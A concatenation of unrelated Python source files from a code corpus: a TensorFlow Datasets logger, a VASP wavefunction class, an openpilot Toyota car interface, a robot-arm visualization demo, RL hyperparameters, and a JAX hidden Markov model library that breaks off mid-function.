# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A logger logging using absl.logging module."""
from typing import Dict, Optional
from absl import logging
from tensorflow_datasets.core.logging import base_logger
from tensorflow_datasets.core.utils import read_config as tfds_read_config
class LoggingLogger(base_logger.Logger):
def as_dataset(self, *, dataset_name: str, config_name: Optional[str],
version: str, data_path: str, split: str,
batch_size: Optional[int], shuffle_files: bool,
read_config: tfds_read_config.ReadConfig, as_supervised: bool,
decoders: Dict[str, str]):
logging.info("Constructing tf.data.Dataset %s for split %s, from %s",
dataset_name, split, data_path)
|
py | 1a4b9182180d2929d9f1a4962df283a4d3cea065 | from pawpyseed.core.wavefunction import *
class NCLWavefunction(pawpyc.CNCLWavefunction, Wavefunction):
def __init__(self, struct, pwf, cr, dim, symprec=1e-4, setup_projectors=False):
"""
Arguments:
struct (pymatgen.core.Structure): structure that the wavefunction describes
pwf (pawpyc.PWFPointer): holder class for pswf_t and k-points/k-point weights
cr (CoreRegion): Contains the pseudopotentials, with projectors and
partials waves, for the structure
            dim (pymatgen.io.vasp.outputs.Outcar OR np.ndarray OR list of length 3):
Outcar object for reading ngf or the dimensions NG* of the FFT grid
setup_projectors (bool, False): Whether to set up the core region
components of the wavefunctions. Pawpyseed will set up the projectors
automatically when they are first needed, so this generally
can be left as False.
Returns:
Wavefunction object
"""
self.band_props = pwf.band_props.copy(order="C")
super(Wavefunction, self).__init__(pwf)
if not self.ncl:
raise PAWpyError(
"Pseudowavefunction is collinear! Call Wavefunction(...) instead"
)
self.structure = struct
self.cr = cr
self.dim = np.array(dim).astype(np.int32)
if setup_projectors:
self.check_c_projectors()
@staticmethod
def from_files(
struct="CONTCAR",
wavecar="WAVECAR",
cr="POTCAR",
vr="vasprun.xml",
setup_projectors=False,
):
"""
Construct a Wavefunction object from file paths.
Arguments:
struct (str): VASP POSCAR or CONTCAR file path
wavecar (str): VASP WAVECAR file path
cr (str): VASP POTCAR file path
vr (str): VASP vasprun file path
setup_projectors (bool, False): Whether to set up the core region
components of the wavefunctions. Pawpyseed will set up the projectors
automatically when they are first needed, so this generally
can be left as False.
Returns:
Wavefunction object
"""
vr = Vasprun(vr)
dim = np.array(
[vr.parameters["NGX"], vr.parameters["NGY"], vr.parameters["NGZ"]]
)
symprec = vr.parameters["SYMPREC"]
pwf = pawpyc.PWFPointer(wavecar, vr)
return NCLWavefunction(
Poscar.from_file(struct).structure,
pwf,
CoreRegion(Potcar.from_file(cr)),
dim,
symprec,
setup_projectors,
)
@staticmethod
def from_directory(path, setup_projectors=False):
"""
Assumes VASP output has the default filenames and is located
        in the directory specified by path.
Arguments:
path (str): VASP output directory
setup_projectors (bool, False): Whether to set up the core region
components of the wavefunctions. Pawpyseed will set up the projectors
automatically when they are first needed, so this generally
can be left as False.
Returns:
Wavefunction object
"""
filepaths = []
for d in ["CONTCAR", "WAVECAR", "POTCAR", "vasprun.xml"]:
filepaths.append(str(os.path.join(path, d)))
args = filepaths + [setup_projectors]
return NCLWavefunction.from_files(*args)
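    # Hedged usage note (paths are placeholders, not values from this package):
    # a wavefunction is typically built either from a VASP run directory, e.g.
    #   wf = NCLWavefunction.from_directory("./noncollinear_run")
    # or by passing the individual file paths to NCLWavefunction.from_files(...).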
def desymmetrized_copy(self, allkpts=None, weights=None):
raise NotImplementedError()
def write_state_realspace(
self, b, k, s, fileprefix="", dim=None, scale=1, remove_phase=False
):
"""
Writes the real and imaginary parts of a given band to two files,
prefixed by fileprefix
Args:
b (int): band number (0-indexed!)
k (int): kpoint number (0-indexed!)
s (int): spin number (0-indexed!)
fileprefix (string, ""): first part of the file name
dim (numpy array of 3 ints, None): dimensions of the FFT grid
scale (scalar, 1): number to multiply the realspace wavefunction by.
For example, VASP multiplies charge density by the volume
of the structure.
remove_phase (False): If True, removes the e^(ikr) phase
from the wavefunction (this does not necessarily mean
the wavefunction is real). This is useful if you want
to visualize the wavefunction because the e^(ikr) phase
makes the wavefunction non-periodic
Returns:
A 3D array (indexed by x,y,z where x,y,z are fractional coordinates)
with complex double values for the realspace wavefunction
The wavefunction is written in two files with z the slow index.
"""
self.check_c_projectors()
if dim is not None:
self.update_dim(np.array(dim))
filename_base = "%sB%dK%dS%d" % (fileprefix, b, k, s)
filename1 = "%s_UP_REAL.vasp" % filename_base
filename2 = "%s_UP_IMAG.vasp" % filename_base
filename3 = "%s_DOWN_REAL.vasp" % filename_base
filename4 = "%s_DOWN_IMAG.vasp" % filename_base
res0, res1 = self._write_realspace_state(
filename1,
filename2,
filename3,
filename4,
scale,
b,
k,
s,
remove_phase=remove_phase,
)
self._convert_to_vasp_volumetric(filename1, self.dim)
self._convert_to_vasp_volumetric(filename2, self.dim)
self._convert_to_vasp_volumetric(filename3, self.dim)
self._convert_to_vasp_volumetric(filename4, self.dim)
return res0, res1
def write_density_realspace(self, filename="PYAECCAR.vasp", dim=None, scale=1):
"""
        Writes the realspace charge density to a file in the
        VASP volumetric format.
        Args:
            filename (string, "PYAECCAR.vasp"): name of the output file
dim (numpy array of 3 ints, None): dimensions of the FFT grid
scale (scalar, 1): number to multiply the realspace wavefunction by.
For example, VASP multiplies charge density by the volume
of the structure.
Returns:
A 3D array (indexed by x,y,z where x,y,z are fractional coordinates)
            with the values of the realspace charge density
The charge density is written with z the slow index.
"""
self.check_c_projectors()
if dim is not None:
self.update_dim(np.array(dim))
res = self._write_realspace_density(filename, scale)
self._convert_to_vasp_volumetric(filename, self.dim)
return res
|
py | 1a4b91ab989ca6dd9af3810da8e590c4f8faf4dc | #!/usr/bin/env python
from common.realtime import sec_since_boot
from cereal import car
from selfdrive.config import Conversions as CV
from selfdrive.controls.lib.drive_helpers import EventTypes as ET, create_event
from selfdrive.controls.lib.vehicle_model import VehicleModel
from selfdrive.car.toyota.carstate import CarState, get_can_parser, get_cam_can_parser
from selfdrive.car.toyota.values import ECU, check_ecu_msgs, CAR, NO_STOP_TIMER_CAR
from selfdrive.swaglog import cloudlog
try:
from selfdrive.car.toyota.carcontroller import CarController
except ImportError:
CarController = None
class CarInterface(object):
def __init__(self, CP, sendcan=None):
self.CP = CP
self.VM = VehicleModel(CP)
self.frame = 0
self.gas_pressed_prev = False
self.brake_pressed_prev = False
self.can_invalid_count = 0
self.cam_can_valid_count = 0
self.cruise_enabled_prev = False
# *** init the major players ***
self.CS = CarState(CP)
self.cp = get_can_parser(CP)
self.cp_cam = get_cam_can_parser(CP)
self.forwarding_camera = False
# sending if read only is False
if sendcan is not None:
self.sendcan = sendcan
self.CC = CarController(self.cp.dbc_name, CP.carFingerprint, CP.enableCamera, CP.enableDsu, CP.enableApgs)
@staticmethod
def compute_gb(accel, speed):
return float(accel) / 3.0
@staticmethod
def calc_accel_override(a_ego, a_target, v_ego, v_target):
return 1.0
@staticmethod
def get_params(candidate, fingerprint):
# kg of standard extra cargo to count for drive, gas, etc...
std_cargo = 136
ret = car.CarParams.new_message()
ret.carName = "toyota"
ret.carFingerprint = candidate
ret.safetyModel = car.CarParams.SafetyModels.toyota
# pedal
ret.enableCruise = not ret.enableGasInterceptor
# FIXME: hardcoding honda civic 2016 touring params so they can be used to
# scale unknown params for other cars
mass_civic = 2923 * CV.LB_TO_KG + std_cargo
wheelbase_civic = 2.70
centerToFront_civic = wheelbase_civic * 0.4
centerToRear_civic = wheelbase_civic - centerToFront_civic
rotationalInertia_civic = 2500
tireStiffnessFront_civic = 192150
tireStiffnessRear_civic = 202500
ret.steerActuatorDelay = 0.12 # Default delay, Prius has larger delay
if candidate != CAR.PRIUS:
ret.lateralTuning.init('pid')
ret.lateralTuning.pid.kiBP, ret.lateralTuning.pid.kpBP = [[0.], [0.]]
if candidate == CAR.PRIUS:
stop_and_go = True
ret.safetyParam = 66 # see conversion factor for STEER_TORQUE_EPS in dbc file
ret.wheelbase = 2.70
ret.steerRatio = 16.00 # unknown end-to-end spec
tire_stiffness_factor = 1.0 # hand-tune
ret.mass = 3375 * CV.LB_TO_KG + std_cargo
ret.lateralTuning.init('indi')
ret.lateralTuning.indi.innerLoopGain = 4.75
ret.lateralTuning.indi.outerLoopGain = 2.0
ret.lateralTuning.indi.timeConstant = 3.0
ret.lateralTuning.indi.actuatorEffectiveness = 1.5
ret.steerActuatorDelay = 0.5
ret.steerRateCost = 0.5
elif candidate in [CAR.RAV4, CAR.RAV4H]:
stop_and_go = True if (candidate in CAR.RAV4H) else False
ret.safetyParam = 73 # see conversion factor for STEER_TORQUE_EPS in dbc file
ret.wheelbase = 2.65
ret.steerRatio = 16.30 # 14.5 is spec end-to-end
tire_stiffness_factor = 0.5533
ret.mass = 3650 * CV.LB_TO_KG + std_cargo # mean between normal and hybrid
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.05]]
ret.lateralTuning.pid.kf = 0.00006 # full torque for 10 deg at 80mph means 0.00007818594
elif candidate == CAR.COROLLA:
stop_and_go = False
ret.safetyParam = 100 # see conversion factor for STEER_TORQUE_EPS in dbc file
ret.wheelbase = 2.70
ret.steerRatio = 17.8
tire_stiffness_factor = 0.444
ret.mass = 2860 * CV.LB_TO_KG + std_cargo # mean between normal and hybrid
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.2], [0.05]]
ret.lateralTuning.pid.kf = 0.00003 # full torque for 20 deg at 80mph means 0.00007818594
elif candidate == CAR.LEXUS_RXH:
stop_and_go = True
ret.safetyParam = 100 # see conversion factor for STEER_TORQUE_EPS in dbc file
ret.wheelbase = 2.79
ret.steerRatio = 16. # 14.8 is spec end-to-end
tire_stiffness_factor = 0.444 # not optimized yet
ret.mass = 4481 * CV.LB_TO_KG + std_cargo # mean between min and max
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.1]]
ret.lateralTuning.pid.kf = 0.00006 # full torque for 10 deg at 80mph means 0.00007818594
elif candidate in [CAR.CHR, CAR.CHRH]:
stop_and_go = True
ret.safetyParam = 100
ret.wheelbase = 2.63906
ret.steerRatio = 13.6
tire_stiffness_factor = 0.7933
ret.mass = 3300. * CV.LB_TO_KG + std_cargo
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.723], [0.0428]]
ret.lateralTuning.pid.kf = 0.00006
elif candidate in [CAR.CAMRY, CAR.CAMRYH]:
stop_and_go = True
ret.safetyParam = 100
ret.wheelbase = 2.82448
ret.steerRatio = 13.7
tire_stiffness_factor = 0.7933
ret.mass = 3400 * CV.LB_TO_KG + std_cargo #mean between normal and hybrid
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.1]]
ret.lateralTuning.pid.kf = 0.00006
elif candidate in [CAR.HIGHLANDER, CAR.HIGHLANDERH]:
stop_and_go = True
ret.safetyParam = 100
ret.wheelbase = 2.78
ret.steerRatio = 16.0
tire_stiffness_factor = 0.444 # not optimized yet
ret.mass = 4607 * CV.LB_TO_KG + std_cargo #mean between normal and hybrid limited
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.05]]
ret.lateralTuning.pid.kf = 0.00006
elif candidate == CAR.AVALON:
stop_and_go = False
ret.safetyParam = 73 # see conversion factor for STEER_TORQUE_EPS in dbc file
ret.wheelbase = 2.82
ret.steerRatio = 14.8 #Found at https://pressroom.toyota.com/releases/2016+avalon+product+specs.download
tire_stiffness_factor = 0.7983
ret.mass = 3505 * CV.LB_TO_KG + std_cargo # mean between normal and hybrid
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.17], [0.03]]
ret.lateralTuning.pid.kf = 0.00006
elif candidate == CAR.RAV4_2019:
stop_and_go = True
ret.safetyParam = 100
ret.wheelbase = 2.68986
ret.steerRatio = 14.3
tire_stiffness_factor = 0.7933
ret.mass = 3370. * CV.LB_TO_KG + std_cargo
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.3], [0.05]]
ret.lateralTuning.pid.kf = 0.00007818594
elif candidate == CAR.COROLLA_HATCH:
stop_and_go = True
ret.safetyParam = 100
ret.wheelbase = 2.63906
ret.steerRatio = 13.9
tire_stiffness_factor = 0.444
ret.mass = 3060. * CV.LB_TO_KG + std_cargo
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.3], [0.05]]
ret.lateralTuning.pid.kf = 0.00007818594
ret.steerRateCost = 1.
ret.centerToFront = ret.wheelbase * 0.44
#detect the Pedal address
ret.enableGasInterceptor = 0x201 in fingerprint
# min speed to enable ACC. if car can do stop and go, then set enabling speed
# to a negative value, so it won't matter.
ret.minEnableSpeed = -1. if (stop_and_go or ret.enableGasInterceptor) else 19. * CV.MPH_TO_MS
centerToRear = ret.wheelbase - ret.centerToFront
# TODO: get actual value, for now starting with reasonable value for
# civic and scaling by mass and wheelbase
ret.rotationalInertia = rotationalInertia_civic * \
ret.mass * ret.wheelbase**2 / (mass_civic * wheelbase_civic**2)
# TODO: start from empirically derived lateral slip stiffness for the civic and scale by
# mass and CG position, so all cars will have approximately similar dyn behaviors
ret.tireStiffnessFront = (tireStiffnessFront_civic * tire_stiffness_factor) * \
ret.mass / mass_civic * \
(centerToRear / ret.wheelbase) / (centerToRear_civic / wheelbase_civic)
ret.tireStiffnessRear = (tireStiffnessRear_civic * tire_stiffness_factor) * \
ret.mass / mass_civic * \
(ret.centerToFront / ret.wheelbase) / (centerToFront_civic / wheelbase_civic)
# no rear steering, at least on the listed cars above
ret.steerRatioRear = 0.
ret.steerControlType = car.CarParams.SteerControlType.torque
# steer, gas, brake limitations VS speed
ret.steerMaxBP = [16. * CV.KPH_TO_MS, 45. * CV.KPH_TO_MS] # breakpoints at 1 and 40 kph
ret.steerMaxV = [1., 1.] # 2/3rd torque allowed above 45 kph
ret.brakeMaxBP = [5., 20.]
ret.brakeMaxV = [1., 0.8]
ret.enableCamera = not check_ecu_msgs(fingerprint, ECU.CAM)
ret.enableDsu = not check_ecu_msgs(fingerprint, ECU.DSU)
ret.enableApgs = False #not check_ecu_msgs(fingerprint, ECU.APGS)
ret.openpilotLongitudinalControl = ret.enableCamera and ret.enableDsu
cloudlog.warn("ECU Camera Simulated: %r", ret.enableCamera)
cloudlog.warn("ECU DSU Simulated: %r", ret.enableDsu)
cloudlog.warn("ECU APGS Simulated: %r", ret.enableApgs)
cloudlog.warn("ECU Gas Interceptor: %r", ret.enableGasInterceptor)
ret.steerLimitAlert = False
ret.longitudinalTuning.deadzoneBP = [0., 9.]
ret.longitudinalTuning.deadzoneV = [0., .15]
ret.longitudinalTuning.kpBP = [0., 5., 35.]
ret.longitudinalTuning.kiBP = [0., 35.]
ret.stoppingControl = False
ret.startAccel = 0.0
if ret.enableGasInterceptor:
ret.gasMaxBP = [0., 9., 35]
ret.gasMaxV = [0.2, 0.5, 0.7]
ret.longitudinalTuning.kpV = [1.2, 0.8, 0.5]
ret.longitudinalTuning.kiV = [0.18, 0.12]
else:
ret.gasMaxBP = [0.]
ret.gasMaxV = [0.5]
ret.longitudinalTuning.kpV = [3.6, 2.4, 1.5]
ret.longitudinalTuning.kiV = [0.54, 0.36]
return ret
# returns a car.CarState
def update(self, c):
# ******************* do can recv *******************
canMonoTimes = []
self.cp.update(int(sec_since_boot() * 1e9), False)
# run the cam can update for 10s as we just need to know if the camera is alive
if self.frame < 1000:
self.cp_cam.update(int(sec_since_boot() * 1e9), False)
self.CS.update(self.cp, self.cp_cam)
# create message
ret = car.CarState.new_message()
# speeds
ret.vEgo = self.CS.v_ego
ret.vEgoRaw = self.CS.v_ego_raw
ret.aEgo = self.CS.a_ego
ret.yawRate = self.VM.yaw_rate(self.CS.angle_steers * CV.DEG_TO_RAD, self.CS.v_ego)
ret.standstill = self.CS.standstill
ret.wheelSpeeds.fl = self.CS.v_wheel_fl
ret.wheelSpeeds.fr = self.CS.v_wheel_fr
ret.wheelSpeeds.rl = self.CS.v_wheel_rl
ret.wheelSpeeds.rr = self.CS.v_wheel_rr
# gear shifter
ret.gearShifter = self.CS.gear_shifter
# gas pedal
ret.gas = self.CS.car_gas
if self.CP.enableGasInterceptor:
# use interceptor values to disengage on pedal press
ret.gasPressed = self.CS.pedal_gas > 15
else:
ret.gasPressed = self.CS.pedal_gas > 0
# brake pedal
ret.brake = self.CS.user_brake
ret.brakePressed = self.CS.brake_pressed != 0
ret.brakeLights = self.CS.brake_lights
# steering wheel
ret.steeringAngle = self.CS.angle_steers
ret.steeringRate = self.CS.angle_steers_rate
ret.steeringTorque = self.CS.steer_torque_driver
ret.steeringPressed = self.CS.steer_override
# cruise state
ret.cruiseState.enabled = self.CS.pcm_acc_active
ret.cruiseState.speed = self.CS.v_cruise_pcm * CV.KPH_TO_MS
ret.cruiseState.available = bool(self.CS.main_on)
ret.cruiseState.speedOffset = 0.
if self.CP.carFingerprint in NO_STOP_TIMER_CAR or self.CP.enableGasInterceptor:
# ignore standstill in hybrid vehicles, since pcm allows to restart without
# receiving any special command
# also if interceptor is detected
ret.cruiseState.standstill = False
else:
ret.cruiseState.standstill = self.CS.pcm_acc_status == 7
buttonEvents = []
if self.CS.left_blinker_on != self.CS.prev_left_blinker_on:
be = car.CarState.ButtonEvent.new_message()
be.type = 'leftBlinker'
be.pressed = self.CS.left_blinker_on != 0
buttonEvents.append(be)
if self.CS.right_blinker_on != self.CS.prev_right_blinker_on:
be = car.CarState.ButtonEvent.new_message()
be.type = 'rightBlinker'
be.pressed = self.CS.right_blinker_on != 0
buttonEvents.append(be)
ret.buttonEvents = buttonEvents
ret.leftBlinker = bool(self.CS.left_blinker_on)
ret.rightBlinker = bool(self.CS.right_blinker_on)
ret.doorOpen = not self.CS.door_all_closed
ret.seatbeltUnlatched = not self.CS.seatbelt
ret.genericToggle = self.CS.generic_toggle
# events
events = []
if not self.CS.can_valid:
self.can_invalid_count += 1
if self.can_invalid_count >= 5:
events.append(create_event('commIssue', [ET.NO_ENTRY, ET.IMMEDIATE_DISABLE]))
else:
self.can_invalid_count = 0
if self.CS.cam_can_valid:
self.cam_can_valid_count += 1
if self.cam_can_valid_count >= 5:
self.forwarding_camera = True
if not ret.gearShifter == 'drive' and self.CP.enableDsu:
events.append(create_event('wrongGear', [ET.NO_ENTRY, ET.SOFT_DISABLE]))
if ret.doorOpen:
events.append(create_event('doorOpen', [ET.NO_ENTRY, ET.SOFT_DISABLE]))
if ret.seatbeltUnlatched:
events.append(create_event('seatbeltNotLatched', [ET.NO_ENTRY, ET.SOFT_DISABLE]))
if self.CS.esp_disabled and self.CP.enableDsu:
events.append(create_event('espDisabled', [ET.NO_ENTRY, ET.SOFT_DISABLE]))
if not self.CS.main_on and self.CP.enableDsu:
events.append(create_event('wrongCarMode', [ET.NO_ENTRY, ET.USER_DISABLE]))
if ret.gearShifter == 'reverse' and self.CP.enableDsu:
events.append(create_event('reverseGear', [ET.NO_ENTRY, ET.IMMEDIATE_DISABLE]))
if self.CS.steer_error:
events.append(create_event('steerTempUnavailable', [ET.NO_ENTRY, ET.WARNING]))
if self.CS.low_speed_lockout and self.CP.enableDsu:
events.append(create_event('lowSpeedLockout', [ET.NO_ENTRY, ET.PERMANENT]))
if ret.vEgo < self.CP.minEnableSpeed and self.CP.enableDsu:
events.append(create_event('speedTooLow', [ET.NO_ENTRY]))
if c.actuators.gas > 0.1:
# some margin on the actuator to not false trigger cancellation while stopping
events.append(create_event('speedTooLow', [ET.IMMEDIATE_DISABLE]))
if ret.vEgo < 0.001:
# while in standstill, send a user alert
events.append(create_event('manualRestart', [ET.WARNING]))
# enable request in prius is simple, as we activate when Toyota is active (rising edge)
if ret.cruiseState.enabled and not self.cruise_enabled_prev:
events.append(create_event('pcmEnable', [ET.ENABLE]))
elif not ret.cruiseState.enabled:
events.append(create_event('pcmDisable', [ET.USER_DISABLE]))
# disable on pedals rising edge or when brake is pressed and speed isn't zero
if (ret.gasPressed and not self.gas_pressed_prev) or \
(ret.brakePressed and (not self.brake_pressed_prev or ret.vEgo > 0.001)):
events.append(create_event('pedalPressed', [ET.NO_ENTRY, ET.USER_DISABLE]))
if ret.gasPressed:
events.append(create_event('pedalPressed', [ET.PRE_ENABLE]))
ret.events = events
ret.canMonoTimes = canMonoTimes
self.gas_pressed_prev = ret.gasPressed
self.brake_pressed_prev = ret.brakePressed
self.cruise_enabled_prev = ret.cruiseState.enabled
return ret.as_reader()
# pass in a car.CarControl
# to be called @ 100hz
def apply(self, c):
self.CC.update(self.sendcan, c.enabled, self.CS, self.frame,
c.actuators, c.cruiseControl.cancel, c.hudControl.visualAlert,
c.hudControl.audibleAlert, self.forwarding_camera,
c.hudControl.leftLaneVisible, c.hudControl.rightLaneVisible, c.hudControl.leadVisible,
c.hudControl.leftLaneDepart, c.hudControl.rightLaneDepart)
self.frame += 1
return False
|
py | 1a4b91c2724d6430fc13323f298fd60c9fd52820 | import swift # instantiate 3D browser-based visualizer
import roboticstoolbox as rtb
from spatialmath import SE3
import numpy as np
env = swift.Swift()
env.launch(realtime=True) # activate it
robot = rtb.models.Panda()
robot.q = robot.qr
T = SE3(0.5, 0.2, 0.1) * SE3.OA([0, 1, 0], [0, 0, -1])
sol = robot.ikine_LM(T) # solve IK
q_pickup = sol.q
qt = rtb.jtraj(robot.qr, q_pickup, 50)
env.add(robot) # add robot to the 3D scene
for qk in qt.q: # for each joint configuration on trajectory
robot.q = qk # update the robot state
# robot.q = robot.qr
env.step(0.05) # update visualization
env.hold()
|
py | 1a4b91e5c45fbabde348484b072f16fd434da902 | """
This file contains the hyperparameter values used for training and
testing RL agents.
"""
import os
BASE_DIR = './results/'
ENV_ID = 'gym_anm:ANM6Easy-v0'
GAMMA = 0.995
POLICY = 'MlpPolicy'
TRAIN_STEPS = 3000000
MAX_TRAINING_EP_LENGTH = 5000
EVAL_FREQ = 10000
N_EVAL_EPISODES = 5
MAX_EVAL_EP_LENGTH = 3000
LOG_DIR = BASE_DIR + ENV_ID + '/'
os.makedirs(LOG_DIR, exist_ok=True)
# Create a new directory for this run.
i = 0
while os.path.isdir(LOG_DIR + f'run_{i}/'):
i += 1
LOG_DIR += f'run_{i}/'
os.makedirs(LOG_DIR, exist_ok=True)
TENSORBOARD_LOG = LOG_DIR + 'tensorboard/'
os.makedirs(TENSORBOARD_LOG, exist_ok=True)
TB_LOG_NAME = 'run'
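# These constants are meant to be imported by a separate training script. A hedged
# sketch of how they might be consumed with stable-baselines3 (an assumption; the
# actual training code is not part of this file):
#   from stable_baselines3 import PPO
#   model = PPO(POLICY, ENV_ID, gamma=GAMMA, tensorboard_log=TENSORBOARD_LOG)
#   model.learn(total_timesteps=TRAIN_STEPS, tb_log_name=TB_LOG_NAME)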
if __name__ == '__main__':
print('Done.')
|
py | 1a4b925fae65b3af676ad86702a3e7c34af6b0c9 | '''
Generalizes hmm_discrete_lib so it can handle any kind of observation distribution
(e.g. Gaussian, Poisson, GMM, product of Bernoullis). It is based on
https://github.com/probml/pyprobml/blob/master/scripts/hmm_lib.py and operates in log space.
Author : Aleyna Kara(@karalleyna)
'''
from jax.random import split
import jax.numpy as jnp
from jax import jit, lax, vmap
from jax.nn import logsumexp, log_softmax, one_hot
from functools import partial
import superimport
import flax
import distrax
'''
Hidden Markov Model class in which trans_dist and init_dist are categorical-like
distributions from distrax, and obs_dist is any instance of distrax.Distribution.
The optimizer functions expect their parameters to be pytrees, so they cannot
work on a vanilla dataclass. For details, see:
https://github.com/google/jax/issues/2371
Since a flax.struct.dataclass is registered as a pytree, it makes it possible to use
jit, vmap and optimizers on the hidden Markov model.
'''
@flax.struct.dataclass
class HMM:
trans_dist: distrax.Distribution
obs_dist: distrax.Distribution
init_dist: distrax.Distribution
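# A minimal construction sketch (comment only, not part of the original module):
# trans_dist and obs_dist are batched over the hidden states, init_dist is unbatched.
# The two-state Gaussian HMM below is purely illustrative.
#   import distrax
#   from jax import random
#   hmm = HMM(
#       trans_dist=distrax.Categorical(logits=jnp.log(jnp.array([[0.9, 0.1],
#                                                                 [0.2, 0.8]]))),
#       obs_dist=distrax.Normal(loc=jnp.array([0.0, 5.0]), scale=jnp.ones(2)),
#       init_dist=distrax.Categorical(logits=jnp.log(jnp.array([0.5, 0.5]))),
#   )
#   states, obs = hmm_sample_log(hmm, 100, random.PRNGKey(0))
#   loglik, alphas = hmm_forwards_log(hmm, obs)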
def logdotexp(u, v, axis=-1):
'''
Calculates jnp.log(jnp.exp(u) * jnp.exp(v)) in a stable way.
Parameters
----------
u : array
v : array
axis : int
Returns
-------
* array
        Logarithm of the Hadamard product of jnp.exp(u) and jnp.exp(v)
'''
max_u = jnp.max(u, axis=axis, keepdims=True)
max_v = jnp.max(v, axis=axis, keepdims=True)
diff_u = jnp.nan_to_num(u - max_u, -jnp.inf)
diff_v = jnp.nan_to_num(v - max_v, -jnp.inf)
u_dot_v = jnp.log(jnp.exp(diff_u) * jnp.exp(diff_v))
u_dot_v = u_dot_v + max_u + max_v
return u_dot_v
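# Quick sanity check (comment only): since log(exp(u) * exp(v)) = u + v elementwise,
#   logdotexp(jnp.log(2.0), jnp.log(3.0))  # == jnp.log(6.0) up to float error
# In this module it is combined with logsumexp to form log-space matrix products,
# e.g. logsumexp(logdotexp(alpha_prev[:, None], trans_dist.logits), axis=0).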
def log_normalize(u, axis=-1):
'''
Normalizes the values within the axis in a way that the exponential of each values within the axis
sums up to 1.
Parameters
----------
u : array
axis : int
Returns
-------
* array
The Log of normalized version of the given matrix
* array(seq_len, n_hidden) :
The values of the normalizer
'''
c = logsumexp(u, axis=axis)
return jnp.where(u == -jnp.inf, -jnp.inf, u - c), c
@partial(jit, static_argnums=(1,))
def hmm_sample_log(params, seq_len, rng_key):
'''
Samples an observation of given length according to the defined
hidden markov model and gives the sequence of the hidden states
as well as the observation.
Parameters
----------
params : HMM
Hidden Markov Model
seq_len: array(seq_len)
The length of the observation sequence
rng_key : array
Random key of shape (2,) and dtype uint32
Returns
-------
* array(seq_len,)
Hidden state sequence
* array(seq_len,) :
Observation sequence
'''
trans_dist, obs_dist, init_dist = params.trans_dist, params.obs_dist, params.init_dist
rng_key, rng_init = split(rng_key)
initial_state = init_dist.sample(seed=rng_init)
def draw_state(prev_state, key):
state = trans_dist.sample(seed=key)[prev_state]
return state, state
rng_key, rng_state, rng_obs = split(rng_key, 3)
keys = split(rng_state, seq_len - 1)
final_state, states = lax.scan(draw_state, initial_state, keys)
states = jnp.append(initial_state, states)
def draw_obs(z, key):
return obs_dist.sample(seed=key)[z]
keys = split(rng_obs, seq_len)
obs_seq = vmap(draw_obs, in_axes=(0, 0))(states, keys)
return states, obs_seq
@jit
def hmm_forwards_log(params, obs_seq, length=None):
'''
Calculates a belief state
Parameters
----------
params : HMM
Hidden Markov Model
obs_seq: array(seq_len)
History of observable events
Returns
-------
* float
The loglikelihood giving log(p(x|model))
* array(seq_len, n_hidden) :
Log of alpha values
'''
seq_len = len(obs_seq)
if length is None:
length = seq_len
trans_dist, obs_dist, init_dist = params.trans_dist, params.obs_dist, params.init_dist
n_states = obs_dist.batch_shape[0]
def scan_fn(carry, t):
(alpha_prev, log_ll_prev) = carry
alpha_n = jnp.where(t < length,
obs_dist.log_prob(obs_seq[t]) + logsumexp(
logdotexp(alpha_prev[:, None], trans_dist.logits), axis=0),
-jnp.inf + jnp.zeros_like(alpha_prev))
alpha_n, cn = log_normalize(alpha_n)
carry = (alpha_n, cn + log_ll_prev)
return carry, alpha_n
# initial belief state
alpha_0, c0 = log_normalize(init_dist.logits + obs_dist.log_prob(obs_seq[0]))
# setup scan loop
init_state = (alpha_0, c0)
ts = jnp.arange(1, seq_len)
carry, alpha_hist = lax.scan(scan_fn, init_state, ts)
# post-process
alpha_hist = jnp.vstack([alpha_0.reshape(1, n_states), alpha_hist])
(alpha_final, log_ll) = carry
return log_ll, alpha_hist
@jit
def hmm_backwards_log(params, obs_seq, length=None):
'''
Computes the backwards probabilities
Parameters
----------
params : HMM
Hidden Markov Model
obs_seq: array(seq_len,)
History of observable events
length : array(seq_len,)
The valid length of the observation sequence
Returns
-------
* array(seq_len, n_states)
Log of beta values
'''
seq_len = len(obs_seq)
if length is None:
length = seq_len
trans_dist, obs_dist, init_dist = params.trans_dist, params.obs_dist, params.init_dist
n_states = trans_dist.batch_shape[0]
beta_t = jnp.zeros((n_states,))
def scan_fn(beta_prev, t):
beta_t = jnp.where(t > length,
-jnp.inf + jnp.zeros_like(beta_prev),
log_normalize(logsumexp(beta_prev + obs_dist.log_prob(obs_seq[-t + 1]) + trans_dist.logits,
axis=1))[0])
return beta_t, beta_t
ts = jnp.arange(2, seq_len + 1)
_, beta_hist = lax.scan(scan_fn, beta_t, ts)
beta_hist = jnp.flip(jnp.vstack([beta_t.reshape(1, n_states), beta_hist]), axis=0)
return beta_hist
@jit
def hmm_forwards_backwards_log(params, obs_seq, length=None):
'''
Computes, for each time step, the marginal conditional probability that the Hidden Markov Model was
in each possible state given the observations that were made at each time step, i.e.
P(z[i] | x[0], ..., x[num_steps - 1]) for all i from 0 to num_steps - 1
Parameters
----------
params : HMM
Hidden Markov Model
obs_seq: array(seq_len)
History of observed states
Returns
-------
* array(seq_len, n_states)
The log of alpha values
* array(seq_len, n_states)
The log of beta values
* array(seq_len, n_states)
The log of marginal conditional probability
* float
The loglikelihood giving log(p(x|model))
'''
seq_len = len(obs_seq)
if length is None:
length = seq_len
def gamma_t(t):
gamma_t = jnp.where(t < length,
alpha[t] + beta[t - length],
jnp.zeros((n_states,)))
return gamma_t
ll, alpha = hmm_forwards_log(params, obs_seq, length)
n_states = alpha.shape[1]
beta = hmm_backwards_log(params, obs_seq, length)
ts = jnp.arange(seq_len)
gamma = vmap(gamma_t, (0))(ts)
# gamma = alpha * jnp.roll(beta, -seq_len + length, axis=0) #: Alternative
